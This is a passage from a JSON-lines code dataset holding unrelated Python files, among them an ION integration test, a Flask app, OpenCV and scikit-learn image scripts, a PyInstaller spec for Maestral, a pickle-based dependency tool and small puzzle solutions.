np\n\n@attr('INT',group='dm')\nclass RecordDictionaryIntegrationTest(IonIntegrationTestCase):\n xps = []\n xns = []\n def setUp(self):\n self._start_container()\n self.container.start_rel_from_url('res/deploy/r2deploy.yml')\n self.dataset_management = DatasetManagementServiceClient()\n self.pubsub_management = PubsubManagementServiceClient()\n\n self.rdt = None\n self.data_producer_id = None\n self.provider_metadata_update = None\n self.event = Event()\n\n def tearDown(self):\n for xn in self.xns:\n xni = self.container.ex_manager.create_xn_queue(xn)\n xni.delete()\n for xp in self.xps:\n xpi = self.container.ex_manager.create_xp(xp)\n xpi.delete()\n\n def verify_incoming(self, m,r,s):\n rdt = 
RecordDictionaryTool.load_from_granule(m)\n self.assertEquals(rdt, self.rdt)\n self.assertEquals(m.data_producer_id, self.data_producer_id)\n self.assertEquals(m.provider_metadata_update, self.provider_metadata_update)\n self.assertNotEqual(m.creation_timestamp, None)\n self.event.set()\n\n\n def test_granule(self):\n \n pdict_id = self.dataset_management.read_parameter_dictionary_by_name('ctd_parsed_param_dict', id_only=True)\n stream_def_id = self.pubsub_management.create_stream_definition('ctd', parameter_dictionary_id=pdict_id)\n pdict = DatasetManagementService.get_parameter_dictionary_by_name('ctd_parsed_param_dict')\n self.addCleanup(self.pubsub_management.delete_stream_definition,stream_def_id)\n\n stream_id, route = self.pubsub_management.create_stream('ctd_stream', 'xp1', stream_definition_id=stream_def_id)\n self.addCleanup(self.pubsub_management.delete_stream,stream_id)\n self.xps.append('xp1')\n publisher = StandaloneStreamPublisher(stream_id, route)\n\n subscriber = StandaloneStreamSubscriber('sub', self.verify_incoming)\n subscriber.start()\n\n subscription_id = self.pubsub_management.create_subscription('sub', stream_ids=[stream_id])\n self.xns.append('sub')\n self.pubsub_management.activate_subscription(subscription_id)\n\n\n rdt = RecordDictionaryTool(stream_definition_id=stream_def_id)\n rdt['time'] = np.arange(10)\n rdt['temp'] = np.random.randn(10) * 10 + 30\n rdt['pressure'] = [20] * 10\n\n self.assertEquals(set(pdict.keys()), set(rdt.fields))\n self.assertEquals(pdict.temporal_parameter_name, rdt.temporal_parameter)\n\n self.rdt = rdt\n self.data_producer_id = 'data_producer'\n self.provider_metadata_update = {1:1}\n\n publisher.publish(rdt.to_granule(data_producer_id='data_producer', provider_metadata_update={1:1}))\n\n self.assertTrue(self.event.wait(10))\n \n self.pubsub_management.deactivate_subscription(subscription_id)\n self.pubsub_management.delete_subscription(subscription_id)\n \n filtered_stream_def_id = self.pubsub_management.create_stream_definition('filtered', parameter_dictionary_id=pdict_id, available_fields=['time', 'temp'])\n self.addCleanup(self.pubsub_management.delete_stream_definition, filtered_stream_def_id)\n rdt = RecordDictionaryTool(stream_definition_id=filtered_stream_def_id)\n self.assertEquals(rdt._available_fields,['time','temp'])\n rdt['time'] = np.arange(20)\n rdt['temp'] = np.arange(20)\n with self.assertRaises(KeyError):\n rdt['pressure'] = np.arange(20)\n\n granule = rdt.to_granule()\n rdt2 = RecordDictionaryTool.load_from_granule(granule)\n self.assertEquals(rdt._available_fields, rdt2._available_fields)\n self.assertEquals(rdt.fields, rdt2.fields)\n for k,v in rdt.iteritems():\n self.assertTrue(np.array_equal(rdt[k], rdt2[k]))\n \n rdt = RecordDictionaryTool(stream_definition_id=stream_def_id)\n rdt['time'] = np.array([None,None,None])\n self.assertTrue(rdt['time'] is None)\n \n rdt['time'] = np.array([None, 1, 2])\n self.assertEquals(rdt['time'][0], rdt.fill_value('time'))\n\n\n\n\n\n \n","sub_path":"ion/services/dm/utility/test/test_granule.py","file_name":"test_granule.py","file_ext":"py","file_size_in_byte":4946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"416018849","text":"import os\nimport pickle\nimport time\nfrom utils import *\nimport argparse\n\n\ndef result_gen(write_path, folder, model_dir):\n with open(write_path, 'w') as f:\n f.write('Folder name')\n f.write('\\t')\n f.write('Prediction')\n f.write('\\t')\n f.write('Prob')\n f.write('\\t')\n 
f.write('Runtime')\n f.write('\\n')\n\n for brand in os.listdir(folder):\n ## open screenshot\n shot_path = folder + '/' + brand + '/shot.png'\n\n ## generate sliding windows\n start_time = time.time()\n\n pred = ''\n max_prob = 0\n for target in os.listdir(model_dir):\n with open(model_dir + '/' + target + '/svm_model.pkl', 'rb') as handle:\n model = pickle.load(handle)\n sc, pick, img = pred_logosense(model=model,\n shot_path=shot_path)\n if len(sc):\n if max(sc) >= max_prob:\n max_prob = max(sc)\n pred = target\n\n runtime = time.time() - start_time\n\n with open(write_path, 'a+') as f:\n f.write(folder + '/' + brand)\n f.write('\\t')\n f.write(pred)\n f.write('\\t')\n f.write(str(max_prob))\n f.write('\\t')\n f.write(str(runtime))\n f.write('\\n')\n\n print(\"-\"*20 + \"True brand: \" + brand.split('+')[0] + \"-\"*20)\n print(\"-\"*20 + \"Predicted brand: \" + pred + \"-\"*20)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', \"--output_path\", help='Where you save the result txt file',\n default= 'data/logosense_test.txt')\n\n parser.add_argument('-f', \"--folder\", help='Folder you want to test', required=True)\n\n parser.add_argument('-m', '--model_dir', help='Models for 5 brands', default='data/SVM_imageset')\n args = parser.parse_args()\n\n result_gen(args.output_path, args.folder, args.model_dir)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"102645646","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom sklearn.preprocessing import MinMaxScaler\nimport numpy as np\nimport mahotas\nimport cv2\nimport os\nimport h5py\n\n\n# In[2]:\n\n\ntest_path = \"test\"\n\n\n# bins for histogram\nbins = 30\n\n# Feature descriptor 1: Hu Moments\ndef fd_hu_moments(image):\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n feature = cv2.HuMoments(cv2.moments(image)).flatten()\n return feature\n\n# Feature descriptor 2: Haralick Texture\ndef fd_haralick(image):\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n haralick = mahotas.features.haralick(gray).mean(axis=0)\n return haralick\n\n# Feature descriptor 3: Color Histogram\ndef fd_histogram(image, mask=None):\n image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n hist = cv2.calcHist([image], [0, 1, 2], None, [bins, bins, bins], [0, 256, 0, 256, 0, 256])\n cv2.normalize(hist, hist)\n return hist.flatten()\n\nglob_features = []\n\n\n\nlist_of_files = os.listdir(test_path)\n\n \nfor imag_file in list_of_files:\n imag_file_path = os.path.join(test_path,imag_file)\n\n # Read the image\n image_ = cv2.imread(imag_file_path)\n if image_ is None:\n raise RuntimeError(\"No image\")\n \n # Feature extraction\n \n fv_hu_moments = fd_hu_moments(image_)\n fv_haralick = fd_haralick(image_)\n fv_histogram = fd_histogram(image_)\n\n \n # Concatenate the features and update the feature vector list\n \n glob_feature = np.hstack([fv_histogram, fv_haralick, fv_hu_moments])\n glob_features.append(glob_feature)\n\n\nprint(\".... completed Feature Extraction of test data...\")\n\n# Get the size of the overall feature vector\nprint(\".... feature vector size {}\".format(np.array(glob_features).shape))\n\n \n# Normalize the feature vectors to the range (0-1)\nscaler = MinMaxScaler(feature_range=(0, 1))\nrescaled_features_ = scaler.fit_transform(glob_features)\nprint(\".... feature vector normalized...\")\n\n# Save the feature vectors with HDF5\nh5f_test_data = h5py.File('Output/test_data.h5', 'w')\nh5f_test_data.create_dataset('dataset_1', data=np.array(rescaled_features_))\n\nh5f_test_data.close()\n\nprint(\".... 
end of vectorisation of test data..\")\n\n","sub_path":"feature_test.py","file_name":"feature_test.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"560231944","text":"# -*- mode: python ; coding: utf-8 -*-\n\nblock_cipher = None\n\n\nimport time\nimport pkg_resources as pkgr\nfrom maestral import __version__, __author__\n\n\ntry:\n with open('bundle_version_macos.txt', 'r') as f:\n bundle_version = str(int(f.read()) + 1)\nexcept FileNotFoundError:\n bundle_version = '1' # keep as str: it is written back to the file below\n\nwith open('bundle_version_macos.txt', 'w') as f:\n f.write(bundle_version)\n\n\ndef Entrypoint(dist, group, name, **kwargs):\n\n packages = []\n\n kwargs.setdefault('pathex', [])\n # get the entry point\n ep = pkgr.get_entry_info(dist, group, name)\n # insert path of the egg at the very front of the search path\n kwargs['pathex'] = [ep.dist.location] + kwargs['pathex']\n # script name must not be a valid module name to avoid name clashes on import\n script_path = os.path.join(workpath, name + '-script.py')\n print(\"creating script for entry point\", dist, group, name)\n with open(script_path, 'w') as fh:\n print(\"import\", ep.module_name, file=fh)\n print(\"%s.%s()\" % (ep.module_name, '.'.join(ep.attrs)), file=fh)\n for package in packages:\n print(\"import\", package, file=fh)\n\n return Analysis(\n [script_path] + kwargs.get('scripts', []),\n **kwargs\n )\n\n\na = Entrypoint('maestral_qt', 'console_scripts', 'maestral_qt',\n binaries=[],\n datas= [\n (pkgr.resource_filename('maestral_qt', 'resources/tray-icons-svg/*.svg'), 'maestral_qt/resources/tray-icons-svg'),\n (pkgr.resource_filename('maestral_qt', 'resources/maestral.png'), 'maestral_qt/resources'),\n (pkgr.resource_filename('maestral_qt', 'resources/faceholder.png'), 'maestral_qt/resources'),\n (pkgr.resource_filename('maestral_qt', 'resources/*.ui'), 'maestral_qt/resources'),\n (pkgr.resource_filename('maestral', 'resources/*'), 'maestral/resources'),\n ],\n hiddenimports=['pkg_resources.py2_warn'],\n hookspath=['hooks'],\n runtime_hooks=[],\n excludes=['_tkinter'],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher,\n noarchive=False)\npyz = PYZ(a.pure, a.zipped_data,\n cipher=block_cipher)\nexe = EXE(pyz,\n a.scripts,\n [],\n exclude_binaries=True,\n name='main',\n debug=False,\n bootloader_ignore_signals=False,\n strip=False,\n upx=True,\n console=False )\ncoll = COLLECT(exe,\n a.binaries,\n a.zipfiles,\n a.datas,\n strip=False,\n upx=True,\n upx_exclude=[],\n name='main')\napp = BUNDLE(coll,\n name='Maestral.app',\n icon=pkgr.resource_filename('maestral_qt', 'resources/maestral.icns'),\n bundle_identifier='com.samschott.maestral',\n info_plist={\n 'NSHighResolutionCapable': 'True',\n 'NSRequiresAquaSystemAppearance': 'False',\n 'LSUIElement': '1',\n 'CFBundleVersion': bundle_version,\n 'CFBundleShortVersionString': __version__,\n 'NSHumanReadableCopyright': 'Copyright © {} {}. 
All rights reserved.'.format(time.strftime('%Y'), __author__),\n 'LSMinimumSystemVersion': '10.13.0',\n },\n)\n","sub_path":"package/maestral_macos.spec","file_name":"maestral_macos.spec","file_ext":"spec","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"413191563","text":"import math\n\ndef ncr(n,r):\n f = math.factorial\n return f(n) / f(r) / f(n-r)\nif __name__ == '__main__':\n n = int(input())\n x = int(input())\n i = 0\n midPoint = n // 2\n res = 0\n last = 0\n while i <= midPoint:\n last = int(ncr(n,i))\n res += last\n i += 1\n res *=2\n if n%2 == 0:\n res -= last\n res -= 1\n print(abs(res-x))","sub_path":"Contests/WalmartLabs Codesprint (Algorithms)/Hiking Selfies.py","file_name":"Hiking Selfies.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"464956484","text":"# Program to multiply two matrices using nested loops\n\n\n# 3x2 matrix\nX = [[2, 4], [4, 6], [6, 8]]\n# 2x3 matrix\nY = [[8, 6, 4], [6, 4, 8]]\n\n# resultant matrix\nresult = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]\n\n# iterating rows of X matrix\nfor i in range(len(X)):\n # iterating columns of Y matrix\n for j in range(len(Y[0])):\n # iterating rows of Y matrix\n for k in range(len(Y)):\n result[i][j] += X[i][k] * Y[k][j]\n\nfor r in result:\n print(r)","sub_path":"15.multiplymatrics.py","file_name":"15.multiplymatrics.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"614354512","text":"#!/usr/bin/python3\n\nimport pickle\nimport os\nimport sys\n#from pathlib import Path\n#import bz2\n\nHOME = \"C:/Users/Patrick/Documents\"\nHELP_PAGE = \"error: help page could not be loaded, ensure that help.txt is present\"\n\ndeps = {}\nconfig = {}\nconfig[\"db\"] = \"default.pickle\"\n\ndef load_help_page():\n global HELP_PAGE\n fn = \"./help/help.txt\"\n if not os.path.isfile(fn):\n return\n\n fp = open(fn, \"r\")\n HELP_PAGE = fp.read()\n fp.close()\n\ndef correct(key):\n d = deps[key]\n d.include_path = d.include_path.replace(\"\\\\\", \"/\")\n d.debug_library_path = d.debug_library_path.replace(\"\\\\\", \"/\")\n d.release_library_path = d.release_library_path.replace(\"\\\\\", \"/\")\n\ndef init_config():\n fp = open(\"./config.pickle\", \"wb\")\n pickle.dump(config, fp)\n fp.close()\n\ndef load_config():\n global config\n db = \"./config.pickle\"\n if not os.path.isfile(db):\n init_config()\n\n fp = open(db, \"rb\")\n config = pickle.load(fp)\n fp.close()\n\nclass Dependency:\n def __init__(self):\n self.include_path = \"\"\n self.version = 1.0\n self.debug_library_path = \"\"\n self.release_library_path = \"\"\n self.release_libraries = []\n self.debug_libraries = []\n\ndef init_db():\n empty_dict = {}\n fp = open(config[\"db\"], \"wb\")\n pickle.dump(empty_dict, fp)\n fp.close()\n\ndef load_db():\n global deps\n db = config[\"db\"]\n\n if not os.path.isfile(db):\n print(\"creating new database\")\n init_db()\n\n fp = open(db, \"rb\")\n deps = pickle.load(fp)\n fp.close()\n\ndef remove_dependency(name):\n if not name in deps.keys():\n print(\"error: dep doesn't exist\")\n return\n\n deps.pop(name, None)\n\ndef register_new_dependency(name, inc_p, d_lib_p, r_lib_p, d_libs, r_libs):\n if name in deps:\n print(\"error, dep already exists\")\n return\n\n d = Dependency()\n d.include_path = inc_p\n d.debug_library_path = d_lib_p\n 
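# note: paths are stored as given; the 'correct' command rewrites backslashes to forward slashes\n 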
d.release_library_path = r_lib_p\n d.debug_libraries = d_libs.split(';')[:]\n d.release_libraries = r_libs.split(';')[:]\n\n deps[name] = d\n\ndef find_dependency(name):\n if not name in deps.keys():\n sys.stdout.write(\"error: dep does not exist\")\n return\n\n return deps[name]\n\ndef push():\n fp = open(config[\"db\"], \"wb\")\n pickle.dump(deps, fp)\n fp.close()\n\ndef push_config():\n fp = open(\"./config.pickle\", \"wb\")\n pickle.dump(config, fp)\n fp.close()\n\ndef main(argc, argv):\n load_help_page()\n load_config()\n load_db()\n\n if argc < 2:\n print(\"usage: fd.py <command>\\ntype fd.py help for a list of commands\")\n return\n\n command = argv[1]\n\n if command == \"help\":\n print(HELP_PAGE)\n\n elif command == \"config\":\n if argc < 4:\n print(\"usage: config <option> <value>\")\n return\n\n subcmd = argv[2]\n value = argv[3]\n\n if subcmd == \"setcurrentdb\":\n config[\"db\"] = value\n push_config()\n return\n\n elif command == \"correct\":\n name = input(\"dep to correct: \")\n correct(name)\n print(\"corrected\")\n push()\n return\n\n elif command == \"register\":\n name = input(\"enter dependency name: \")\n #version = input(\"enter version: \")\n inc_p = input(\"enter include path: \")\n d_lib_p = input(\"enter debug library path: \")\n r_lib_p = input(\"enter release library path: \")\n d_libs = input(\"enter debug libraries: \")\n r_libs = input(\"enter release libraries: \")\n\n register_new_dependency(name, inc_p, d_lib_p, r_lib_p, d_libs, r_libs)\n\n push()\n\n elif command == \"dump\":\n print(deps)\n\n elif command == \"list\":\n for key in deps.keys():\n print(key)\n\n elif command == \"remove\":\n if argc < 3:\n sys.stdout.write(\"usage: remove <name>\")\n return\n\n name = argv[2]\n remove_dependency(name)\n push()\n\n elif command == \"get\":\n if argc < 5:\n print(\"usage: get <name> <field> <mode>\")\n return\n\n name = argv[2]\n field = argv[3]\n mode = argv[4]\n\n if not name in deps:\n print(\"error: dependency does not exist\")\n return\n\n if field == \"I\":\n out = deps[name].include_path\n sys.stdout.write(out)\n return out\n\n elif field == \"L\":\n if mode == \"debug\":\n out = deps[name].debug_library_path\n sys.stdout.write(out)\n return out\n elif mode == \"release\":\n out = deps[name].release_library_path\n sys.stdout.write(out)\n return out\n else:\n print(\"error: unknown mode\")\n return\n\n elif field == \"l\":\n out = \"\"\n if mode == \"debug\":\n for lib in deps[name].debug_libraries:\n out += lib + ';'\n sys.stdout.write(out)\n return out\n elif mode == \"release\":\n for lib in deps[name].release_libraries:\n out += lib + ';'\n sys.stdout.write(out)\n return out\n else:\n print(\"error: unknown mode\")\n return\n\n else:\n print(\"error: unknown field\")\n return\n\n\nif __name__ == \"__main__\":\n main(len(sys.argv), sys.argv)\n sys.stdout.flush()\n","sub_path":"fd.py","file_name":"fd.py","file_ext":"py","file_size_in_byte":5454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"230521248","text":"from flask import Flask, jsonify, render_template, url_for\napp = Flask(__name__) \n\n@app.route('/') \ndef hello():\n\tresults = {} \n\treturn render_template('index.html', results=results)\n\n\n@app.route('/test/') \ndef test():\n\treturn 'Success'\n\t\nif __name__ == '__main__': \n\tapp.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"219199254","text":"import numpy as np\r\nimport cv2\r\nfrom 
matplotlib import pyplot as plt\r\nfrom utils.descriptor import Descriptor\r\nfrom utils.matcher import Matcher\r\nfrom utils.detectletters import DetectLetters\r\nfrom utils.webcam import Webcam\r\nfrom utils.stabilization import Stabilization\r\nimport math, sys\r\nimport difflib\r\n\r\nMIN_MATCH_COUNT = 10\r\nSKIP_FRAMES = 2\r\nWIDTH = 480\r\n\r\nWords = [\"CACHORRO\",\"CAVALO\",\"ELEFANTE\",\"GATO\",\"TIGRE\",\"VACA\"]\r\n\r\ndef resize(image, width = None, height = None, inter = cv2.INTER_AREA):\r\n\t# initialize the dimensions of the image to be resized and\r\n\t# grab the image size\r\n\tdim = None\r\n\t(h, w) = image.shape[:2]\r\n\r\n\t# if both the width and height are None, then return the\r\n\t# original image\r\n\tif width is None and height is None:\r\n\t\treturn image\r\n\r\n\t# check to see if the width is None\r\n\tif width is None:\r\n\t\t# calculate the ratio of the height and construct the\r\n\t\t# dimensions\r\n\t\tr = height / float(h)\r\n\t\tdim = (int(w * r), height)\r\n\r\n\t# otherwise, the height is None\r\n\telse:\r\n\t\t# calculate the ratio of the width and construct the\r\n\t\t# dimensions\r\n\t\tr = width / float(w)\r\n\t\tdim = (width, int(h * r))\r\n\r\n\t# resize the image\r\n\tresized = cv2.resize(image, dim, interpolation = inter)\r\n\r\n\t# return the resized image\r\n\treturn resized\r\n\r\n\r\n\t\r\ndef lineDist(lines, dist):\r\n\tif np.size(lines) > 4:\r\n\t\ty = lines[:,0,1]\r\n\t\tlines = lines[np.argsort(y)]\r\n\t\t\r\n\t\tlinesFinal = []\r\n\t\tlinesFinal.append(lines[0])\r\n\t\t \r\n\t\tdiff = abs(lines[1:,0,1] - lines[:-1,0,1])\r\n\r\n\t\tfor i in range(len(diff)):\r\n\t\t\tif diff[i] > dist:\r\n\t\t\t\tlinesFinal.append(lines[i+1])\r\n\telse:\r\n\t\treturn lines, -1\r\n\r\n\treturn np.array(linesFinal), 0\r\n\r\n\t# lines = cv2.HoughLinesP(edges,1,np.pi/180,275, minLineLength = 600, maxLineGap = 100)[0].tolist()\r\n\t# for x1,y1,x2,y2 in lines:\r\n\t\t# for index, (x3,y3,x4,y4) in enumerate(lines):\r\n\r\n\t\t\t# if y1==y2 and y3==y4: # Horizontal Lines\r\n\t\t\t\t# diff = abs(y1-y3)\r\n\t\t\t# elif x1==x2 and x3==x4: # Vertical Lines\r\n\t\t\t\t# diff = abs(x1-x3)\r\n\t\t\t# else:\r\n\t\t\t\t# diff = 0\r\n\r\n\t\t\t# if diff < 10 and diff is not 0:\r\n\t\t\t\t# del lines[index]\r\n\r\n\t# gridsize = (len(lines) - 2) / 2\r\n\t\r\n\t\r\ndef lineDetect(gray):\r\n\r\n\tblurred = cv2.GaussianBlur(gray, (5, 5), 0)\r\n\tthresh = cv2.adaptiveThreshold(blurred,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C , cv2.THRESH_BINARY_INV,15,2) #45\r\n\t#ret3,thresh = cv2.threshold(blurred,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\r\n\t#thresh = cv2.bitwise_not(thresh)\r\n\t\r\n\tedges = cv2.Canny(thresh,30,150,apertureSize = 5)\r\n\tminLineLength= 30#gray.shape[1]-50\r\n\t\r\n\tlines = cv2.HoughLinesP(image=edges,rho=0.1,theta=np.pi/180, threshold=5,lines=np.array([]), minLineLength=minLineLength,maxLineGap=10)\r\n\tlines, res = lineDist(lines,10)\r\n\t\r\n\timageO = cv2.cvtColor(gray, cv2.COLOR_GRAY2BGR)\r\n\t\r\n\tif res != -1:\r\n\t\ta,b,c = lines.shape\r\n\t\tfor i in range(a):\r\n\t\t\tprint(lines[i][0][0], lines[i][0][1])\r\n\t\t\tcv2.line(imageO, (lines[i][0][0], lines[i][0][1]), (lines[i][0][2], lines[i][0][3]), (0,0,255), 2, cv2.LINE_AA)\r\n\r\n\treturn imageO\r\n\r\n\r\n\t\r\n\t\r\nif __name__ == '__main__':\r\n\r\n\t# trainImage\r\n\timg1 = cv2.imread('images/Olha-Como-se-Escreve-lamina.jpg',0)\r\n\timg1 = resize(img1, width = WIDTH)\r\n\tcv2.imshow(\"Original Card\",img1)\r\n\t\t\r\n\tdescriptor = Descriptor(useSIFT = False)\r\n\t(refKps, refDescs) = 
descriptor.describe(img1)\r\n\t\r\n\tmatcher = Matcher(descriptor, ratio = 0.7, minMatches = MIN_MATCH_COUNT, distanceMethod = \"FlannBased\", useHamming = 1)\r\n\t\r\n\tletters = DetectLetters('letters_svm2.dat')\r\n\t\r\n\t# initialise webcam\r\n\tvideo = Webcam(1)\r\n\tif (video.cameraIsOpened() is False):\r\n\t\tprint ( \"Unable to connect to camera\" )\r\n\t\tsys.exit()\r\n\t\t\r\n\tvideo.start()\r\n\t\r\n\tOFrame = video.get_current_frame()\r\n\timGrayPrev = cv2.cvtColor(OFrame, cv2.COLOR_BGR2GRAY)\r\n\timGrayPrev = resize(imGrayPrev, width = WIDTH)\r\n\t\r\n\t#stabilization = Stabilization()\r\n\t\r\n\t#stabilization.setImagePrev(imGrayPrev)\r\n\t\t\r\n\tfps = 30.0\r\n\t\r\n\tcv2.namedWindow(\"Main Frame\", cv2.WINDOW_AUTOSIZE)\r\n\tcv2.namedWindow(\"Corrected Perspective\", cv2.WINDOW_AUTOSIZE)\r\n\t\r\n\tt = cv2.getTickCount()\r\n\tcount = 0\r\n\tisFirstFrame = True\r\n\t\r\n\twhile True:\r\n\t\tif count==0:\r\n\t\t\tt = cv2.getTickCount()\r\n\t\t\t\r\n\t\t#ret, OriginalFrame = video.read()\r\n\t\tOriginalFrame = video.get_current_frame()\r\n\t\timage = cv2.cvtColor(OriginalFrame, cv2.COLOR_BGR2GRAY)\r\n\t\timg2 = resize(image, width = WIDTH)\t\r\n\t\t\r\n\t\t#if ret:\r\n\t\t\r\n\t\tif (count % SKIP_FRAMES == 0):\r\n\r\n\t\t\t(Kps, Descs) = descriptor.describe(img2)\r\n\t\t\r\n\t\t\tif np.size(Kps) > 4:\r\n\r\n\t\t\t\t# find the keypoints and descriptors with BRISK\r\n\t\t\t\tptsA, ptsB = matcher.match(Kps, Descs, refKps, refDescs)\r\n\t\t\t\t\r\n\t\t\t\tif np.array(ptsA).size > 5 and np.array(ptsB).size > 5:\r\n\t\t\t\t\t#print(\"Antes Stab\")\r\n\t\t\t\t\t#print(ptsA.shape,ptsB.shape)\r\n\t\t\t\t\t\r\n\t\t\t\t\t#stabilization.procesStabilization(img2, isFirstFrame, ptsB.tolist())\r\n\t\t\t\t\t#ptsB = stabilization.getPointsNP()\r\n\t\t\t\t\t\r\n\t\t\t\t\t#if np.array(ptsB).size:\r\n\t\t\t\t\t#\tprint(\"Antes Homography\")\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t#\tK = min(ptsA.shape[0],ptsB.shape[0])\r\n\t\t\t\t\t\t\r\n\t\t\t\t\tM, score = matcher.calcHomography(ptsA, ptsB, inverseHomography = False)\r\n\t\t\t\t\t\r\n\t\t\t\t\tif np.size(M) == 9:\r\n\t\t\t\t\t\tif letters.isInProcess() == False:\r\n\t\t\t\t\t\t\tL,im_O = letters.detect(img2.copy(),M)\r\n\t\t\t\t\t\t\tcv2.imshow(\"Corrected Perspective\",im_O)\r\n\t\t\t\t\t\t\tW = difflib.get_close_matches(L, Words,1)\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tif W and (W[0] in Words):\r\n\t\t\t\t\t\t\t\tletters.setInProcess(True)\r\n\t\t\t\t\t\t\t\tprint(L,W[0])\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t# size = img2.shape\r\n\t\t\t\t\t\t# im_dst = cv2.warpPerspective(img2, M, (size[1],size[0]))\r\n\t\t\t\t\t\t# im_O2 = cv2.cvtColor(im_dst, cv2.COLOR_GRAY2BGR)\r\n\t\t\t\t\t\t# cv2.imshow(\"Homography\",im_O2)\r\n\t\t\t\telse:\r\n\t\t\t\t\tletters.setInProcess(False)\r\n\t\t\r\n\t\tisFirstFrame = False\r\n\t\t#stabilization.setImagePrev(img2)\r\n\t\t\r\n\t\tcv2.imshow(\"Main Frame\",OriginalFrame)\r\n\t\t\r\n\t\tk = cv2.waitKey(1) & 0xFF\r\n\t\tif k == 27:\r\n\t\t\tbreak\r\n\t\t# increment frame counter\r\n\t\tcount = count + 1\r\n\t\t# calculate fps at an interval of 100 frames\r\n\t\tif (count == 100):\r\n\t\t\tt = (cv2.getTickCount() - t)/cv2.getTickFrequency()\r\n\t\t\tfps = 100.0/t\r\n\t\t\tcount = 0\r\n\t\t\r\n\t\t\r\n\tvideo.stop_video()\r\n\tcv2.destroyAllWindows()\r\n","sub_path":"scripts/detectLetters-Card/detectLetters_video.py","file_name":"detectLetters_video.py","file_ext":"py","file_size_in_byte":5955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"595077091","text":"from typing import 
Iterable\nimport random\n\nfrom mbrowser.adapters.abstract_repository import AbstractRepository\nfrom mbrowser.domain.model import Movie\n\n\ndef get_director_full_names(repo: AbstractRepository):\n directors = repo.get_directors()\n director_full_names = [director.director_full_name for director in directors]\n\n return director_full_names\n\ndef get_actor_full_names(repo: AbstractRepository):\n actors = repo.get_actors()\n actor_full_names = [actor.actor_full_name for actor in actors]\n\n return actor_full_names\n\ndef get_genre_names(repo: AbstractRepository):\n genres = repo.get_genres()\n genre_names = [genre.genre_name for genre in genres]\n\n return genre_names\n\n\ndef get_random_movies(quantity, repo: AbstractRepository):\n movie_count = repo.get_number_of_movies()\n\n if quantity >= movie_count:\n # Reduce the quantity of ids to generate if the repository has an insufficient number of movies.\n quantity = movie_count - 1\n\n # Pick distinct and random movies.\n random_ids = random.sample(range(1, movie_count), quantity)\n movies = repo.get_movies_by_id(random_ids)\n\n return movies_to_dict(movies)\n\n\n# ============================================\n# Functions to convert dicts to model entities\n# ============================================\n\ndef movie_to_dict(movie: Movie):\n movie_dict = {\n 'movie_id': movie.id,\n 'title': movie.title,\n 'release_year': movie.release_year,\n 'director' : movie.director,\n # 'reviews' : movie.reviews,\n }\n return movie_dict\n\n\ndef movies_to_dict(movies: Iterable[Movie]):\n return [movie_to_dict(movie) for movie in movies]","sub_path":"mbrowser/utilities/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"79456347","text":"#!/usr/bin/env python\n\n\"\"\"\n\nIt is possible to show that the square root of two can be expressed as an infinite continued fraction.\n\nsqrt(2) = 1 + 1/(2 + 1/(2 + 1/(2 + ...)))\n\nBy expanding this for the first four iterations, we get:\n\n1 + 1/2 = 3/2 = 1.5\n1 + 1/(2 + 1/2) = 7/5 = 1.4\n1 + 1/(2 + 1/(2 + 1/2)) = 17/12 ~ 1.41666...\n1 + 1/(2 + 1/(2 + 1/(2 + 1/2))) = 41/29 ~ 1.41379...\n\nThe next three expansions are 99/70, 239/169, 577/408, but the eighth expansion 1393/985 is the first example where the number of digits in the numerator exceeds the number of digits in the denominator.\n\nIn the first one-thousand expansions, how many fractions contain a numerator with more digits than the denominator?\n\n\"\"\"\n\n# https://oeis.org/A155046\ndef solve(n):\n a, b, c = 1, 1, 0\n for i in range(1, n+1):\n a, b = a + 2*b, a + b\n if len(str(a)) > len(str(b)):\n c += 1\n return c\n\ndef main():\n print(solve(1000))\n\nmain()\n","sub_path":"project_euler/57-square-root-convergents.py","file_name":"57-square-root-convergents.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"647424225","text":"##############################\n# The following tools can be\n# used in the homework\n# assignment posted\n# 10/10/2017.\n##############################\n\ndef isPrime(n):\n \"\"\" Returns boolean indicating if n is a prime number \"\"\"\n \n n = abs(n)\n\n div = 2\n\n if n in [0,1]:\n return False\n\n while div <= n // div:\n if n % div == 0:\n return False\n div += 1\n \n return True\n\ndef read_file_to_string(file):\n \"\"\" Reads a plain text file to a string \"\"\"\n\n with open(file,\"r\") as 
